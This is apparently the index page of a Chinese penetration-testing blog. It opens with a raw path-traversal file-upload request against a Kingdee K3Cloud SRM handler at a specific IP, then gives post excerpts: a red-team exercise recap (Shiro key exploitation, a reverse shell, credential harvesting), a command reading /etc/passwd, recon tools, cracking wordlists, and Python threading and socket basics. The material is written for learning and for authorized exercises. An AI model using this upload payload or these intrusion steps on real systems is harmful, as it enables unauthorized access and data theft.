宾集静堂 | 问己

0x00.入口点

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: 59.45.53.150:9888
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=zsqxokga
Accept-Encoding: gzip
Content-Length: 276

--zsqxokga
Content-Disposition: form-data; name="dbId_v"

.
--zsqxokga
Content-Disposition: form-data; name="FID"

2022
--zsqxokga
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/ccc.txt"
Content-Type: text/plain

ccc

--zsqxokga--

fakeppa2025年6月29日大约 1 分钟

HVV护网行动总结

经过为期15天的护网行动，收获了很多渗透技法，建立了基本的渗透方法论和工具链

一、渗透15天流水账（叙述）

首次拿到目标清单后，发现有很多公司没有任何网络资产，可能是信息收集不够？第一阶段资产只有不到一半的目标有域名信息

第一个成果是关于shiro框架的漏洞，目标某龙股份有限公司，这个公司是第一阶段10个目标中攻击面最大的目标，第一次的扫描就发现了一些很多的漏洞信息，但当时不知道怎么利用，然后我在第二天去扫描目标c段的时候发现了一个同名公司但是域名不同的url，于是去企查查上搜索了这个公司，发现和目标公司是子公司关系，随后便对子公司目标进行信息搜集，两天后，扫描dddd的时候发现了shiro漏洞，并且直接爆出了密钥key，成功反弹shell连接到vshell，并且还了解到隧道建立的方法，然后在内网中又通过翻找配置文件找到了数据库的连接用户名和密码，最后成功获取了两个系统的管理员账号，在内网发现了内部的管理系统，目标都指向了某龙股份有限公司。

fakeppa2025年6月26日大约 7 分钟

内网方法论

先

cat /etc/passwd |grep sh$

fakeppa2025年6月13日小于 1 分钟

TCP多线程服务器开发

创建一个Queue

name=Queue()

fakeppa2025年6月9日小于 1 分钟

threading库

进程与线程

进程是程序的一次执行过程，是一个动态概念，是程序在执行过程中分配和管理资源的基本单位
进程拥有自己独立的内存空间
程序本身只是指令、数据及其组织形式的描述，进程才是程序的真正运行实例

进程与线程之间的联系

线程是进程的一部分，一个线程只能属于一个进程，而一个进程可以有多个线程，且至少有一个线程

线程的建立

import threading
import time

def run(n):
    print("task", n)
    time.sleep(1)
    print('2s')
    time.sleep(1)
    print('1s')
    time.sleep(1)
    print('0s')
    time.sleep(1)

if __name__ == '__main__':
    t1 = threading.Thread(target=run, args=("t1",))
    t2 = threading.Thread(target=run, args=("t2",))
    t1.start()
    t2.start()

fakeppa2025年6月8日大约 1 分钟

KALI自带字典介绍

1. wordlists 目录

路径：/usr/share/wordlists/

这是 Kali Linux 中的主要字典存储路径，包含了多种用途的字典文件。此外，还有一些项目字典的软链接。

主要字典：
rockyou.txt
路径: /usr/share/wordlists/rockyou.txt
用途: 这是一个非常著名的密码破解字典，包含超过 1400 万条真实密码数据，广泛应用于暴力破解和字典攻击。
备注: 默认情况下，rockyou.txt 是压缩格式（.gz），使用前需要解压。解压命令如下：

fakeppa2025年6月7日大约 9 分钟

信息收集

寻找主域名

零零信安查找主域名

寻找子域

用无影，fofa，layer，oneforall等工具进行子域名收集
用dirsearch进行目录爆破

fakeppa2025年6月7日小于 1 分钟

寒假作业

fakeppa2025年6月7日小于 1 分钟

socket库

scoket(family,type[,protocol])

fakeppa2025年6月7日大约 4 分钟

灯塔OS

灯塔部署

用户名root，密码returnwrong

灯塔字典

docker exec -it arl_worker /bin/bash

fakeppa2025年6月5日小于 1 分钟

我的圣经